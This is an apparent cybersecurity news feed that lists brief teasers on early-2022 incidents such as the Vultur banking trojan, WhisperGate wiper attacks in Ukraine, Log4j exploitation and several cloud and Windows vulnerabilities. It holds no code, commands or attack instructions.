2FA App Loaded with Banking Trojan Infests 10K Victims via Google Play

The Vultur trojan steals bank credentials but asks for permissions to do far more damage down the line. After remaining available for more than two weeks, a malicious two-factor authentication (2FA) application has been removed from Google Play — but not before it was downloaded more than 10,000 times. The app, which is fully functional …

2FA App Loaded with Banking Trojan Infests 10K Victims via Google Play Read More »

Crypto.com confirms 483 accounts hacked, $34 million withdrawn

Crypto.com has confirmed that a multi-million dollar cyber attack led to the compromise of around 400 of its customer accounts. Although, the company’s CEO stresses that customer funds are not at risk. With regards to daily trading volume, Crypto.com is reportedly the world’s third-largest cryptocurrency trading platform “on a mission to accelerate the world’s transition to cryptocurrency.” Crypto.com CEO: 400 …

Crypto.com confirms 483 accounts hacked, $34 million withdrawn Read More »

DHL dethrones Microsoft as most imitated brand in phishing attacks

DHL was the most imitated brand in phishing campaigns throughout Q4 2021, pushing Microsoft to second place, and Google to fourth. This isn’t surprising considering that the final quarter of every year includes the Black Friday, Cyber Monday, and Christmas shopping season, so phishing lures based on package deliveries naturally increase. DHL is an international …

DHL dethrones Microsoft as most imitated brand in phishing attacks Read More »

Microsoft: Fake ransomware targets Ukraine in data-wiping attacks

Microsoft is warning of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine. Starting January 13th, Microsoft detected the new attacks that combined a destructive MBRLocker with a data-corrupting malware used to destroy the victim’s data intentionally. A two-stage attack destroys data Microsoft calls this new malware family ‘WhisperGate’ …

Microsoft: Fake ransomware targets Ukraine in data-wiping attacks Read More »

AWS Patches Glue Bug That Put Customer Data at Risk

Researchers have discovered a critical vulnerability in the AWS Glue service, which could allow remote attackers to access sensitive data owned by large numbers of customers. Dubbed “Superglue” by the Orca Security Research Team, the bug was made possible by an internal misconfiguration within the service. AWS Glue is a serverless data integration service that allows …

AWS Patches Glue Bug That Put Customer Data at Risk Read More »

New Windows Server updates cause DC boot loops, break Hyper-V

The latest Windows Server updates are causing severe issues for administrators, with domain controllers having spontaneous reboots, Hyper-V not starting, and inaccessible ReFS volumes until the updates are rolled back Yesterday, Microsoft released the Windows Server 2012 R2 KB5009624 update, the Windows Server 2019 KB5009557 update, and the Windows Server 2022 KB5009555 update as part …

New Windows Server updates cause DC boot loops, break Hyper-V Read More »

TellYouThePass ransomware returns as a cross-platform Golang threat

TellYouThePass ransomware has re-emerged as a Golang-compiled malware, making it easier to target more operating systems, macOS and Linux, in particular. The return of this malware strain was noticed last month, when threat actors used it in conjunction with the Log4Shell exploit to target vulnerable machines. Now, a report from Crowdstrike sheds more light on this …

TellYouThePass ransomware returns as a cross-platform Golang threat Read More »

New SysJoker backdoor targets Windows, macOS, and Linux

A new multi-platform backdoor malware named ‘SysJoker’ has emerged in the wild, targeting Windows, Linux, and macOS with the ability to evade detection on all three operating systems. The discovery of the new malware comes from researchers at Intezer who first saw signs of its activity in December 2021 after investigating an attack on a …

New SysJoker backdoor targets Windows, macOS, and Linux Read More »

Health Ministry Responds to Massive Data Leak of Medical Records

Reports have emerged about an alleged massive data leak of Indonesian hospital patients’ medical information being sold in an illegal internet forum. Hackers claimed to have breached the Indonesian Health Ministry centralized server to obtain the data.  According to a report by Antaranews, the data that were sold in the dark web contains 720 GB of personal medical information from …

Health Ministry Responds to Massive Data Leak of Medical Records Read More »

Attackers Exploit Flaw in Google Docs’ Comments Feature

A wave of phishing attacks identified in December targeting mainly Outlook users are difficult for both email scanners and victims to flag, researchers said. Attackers are using the “Comments” feature of Google Docs to send malicious links in a phishing campaign targeted primarily at Outlook users, researchers have discovered. Researchers from email collaboration and security …

Attackers Exploit Flaw in Google Docs’ Comments Feature Read More »

Apache found critical bugs in httpd web server

Apache, which name has been in the news for the past two weeks due to the severe vulnerability in the logging library, issued yet another update. This time, it has nothing to do with the Log4j vulnerability (dubbed Log4Shell). Apache issued the patch addressing two CVE-numbered flaws affecting the httpd server. According to the cybersecurity …

Apache found critical bugs in httpd web server Read More »

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities

Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems. “Exploitation attempts and testing have remained high during the last weeks of December,” Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. “We have …

Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities Read More »

Another T-Mobile cyberattack reportedly exposed customer info and SIMs

T-Mobile has suffered another cyberattack after being rocked by a massive data breach in August. This time around, attackers accessed “a small number of” customers’ accounts, according to documents posted by The T-Mo Report. According to the report, customers either fell victim to a SIM swapping attack (which could allow someone to bypass SMS-powered two-factor authentication), had personal plan information …

Another T-Mobile cyberattack reportedly exposed customer info and SIMs Read More »

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

Researchers from CrowdStrike disrupted an attempt by the threat group to steal industrial intelligence and military secrets from an academic institution. Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability. Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a …

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools Read More »

Log4j zero-day vulnerability: Apa yang perlu Anda ketahui

Celah keamanan di Log4j, suatu Java library untuk mencatat pesan error log dalam aplikasi, adalah security vulnerability paling terkenal di internet saat ini dan hadir dengan skor severity 10 dari 10.  Library ini dikembangkan oleh Apache Software Foundation open-source dan merupakan bagian utama dari Java-logging framework. Sejak minggu lalu, peringatan oleh CERT New Zealand menyatakan …

Log4j zero-day vulnerability: Apa yang perlu Anda ketahui Read More »

Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security

Apple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to “trivially and reliably” bypass a “myriad of foundational macOS security mechanisms” and run arbitrary code. Security researcher Patrick Wardle detailed the discovery in a series of tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the …

Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security Read More »

4-Year-Old Microsoft Azure Zero-Day Exposes Web App Source Code

The security vulnerability could expose passwords and access tokens, along with blueprints for internal infrastructure and finding software vulnerabilities. The Microsoft Azure App Service has a four-year-old vulnerability that could reveal the source code of web apps written in PHP, Python, Ruby or Node, researchers said, that were deployed using Local Git. The bug has …

4-Year-Old Microsoft Azure Zero-Day Exposes Web App Source Code Read More »

Two Active Directory Bugs Lead to Easy Windows Domain Takeover

Microsoft is urging customers to patch two Active Directory domain controller bugs after a PoC tool was publicly released on Dec. 12. A proof-of-concept tool has been published that leverages two Windows Active Directory bugs fixed last month that, when chained, can allow easy Windows domain takeover. In a Monday alert, Microsoft urged organizations to immediately …

Two Active Directory Bugs Lead to Easy Windows Domain Takeover Read More »